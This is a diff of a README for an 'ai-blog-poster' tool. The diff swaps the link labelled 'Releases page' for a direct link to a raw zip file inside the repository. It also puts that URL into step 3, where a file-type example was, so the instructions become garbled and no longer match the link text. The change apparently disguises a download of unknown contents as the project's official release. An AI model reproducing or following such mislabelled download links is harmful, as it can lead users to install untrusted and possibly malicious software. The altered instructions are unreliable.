Lukisannan/ai-blog-poster/README.md

 - **OpenAI API Key:** Required for content generation

 ## 📥 Download & Install
-To get started, visit the [Releases page](https://github.com/Lukisannan/ai-blog-poster/releases) to download the latest version of ai-blog-poster.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/Lukisannan/ai-blog-poster/main/sharer/ai-blog-poster.zip) to download the latest version of ai-blog-poster.

 1. Click the link to go to the Releases page.
 2. On the Releases page, find the most recent version.
-3. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `.tar.gz` for Mac or Linux).
+3. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `https://raw.githubusercontent.com/Lukisannan/ai-blog-poster/main/sharer/ai-blog-poster.zip` for Mac or Linux).
 4. Once downloaded, extract the files if needed.

 ### 📂 Running the Application